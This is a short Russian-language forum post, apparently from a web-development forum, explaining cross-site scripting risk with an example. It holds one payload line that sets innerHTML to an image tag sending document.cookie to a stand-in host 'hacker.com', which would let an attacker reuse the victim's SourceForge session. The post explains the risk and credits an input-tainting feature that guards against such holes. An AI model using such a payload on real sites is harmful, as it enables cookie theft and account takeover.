parser

Написать ответ на текущее сообщение

 

 
   команды управления поиском

А вот другой тип:

Sanja v.2 13.03.2006 22:49 / 13.03.2006 22:52

Предположим, попалась мне ссылочка такого вида. Меняем alert на InnerHTML = "<img src='http://hacker.com/img.html?your_cookie=" +document.cookie + "' />" и хакер получает возможность влезть на sourceforge под моим логином. Здесь больше примеров.

Спасибо Александру за taint - слaва богу, в парсере надо постараться специально, чтобы открывать такие дырки у себя ниже ватерлинии.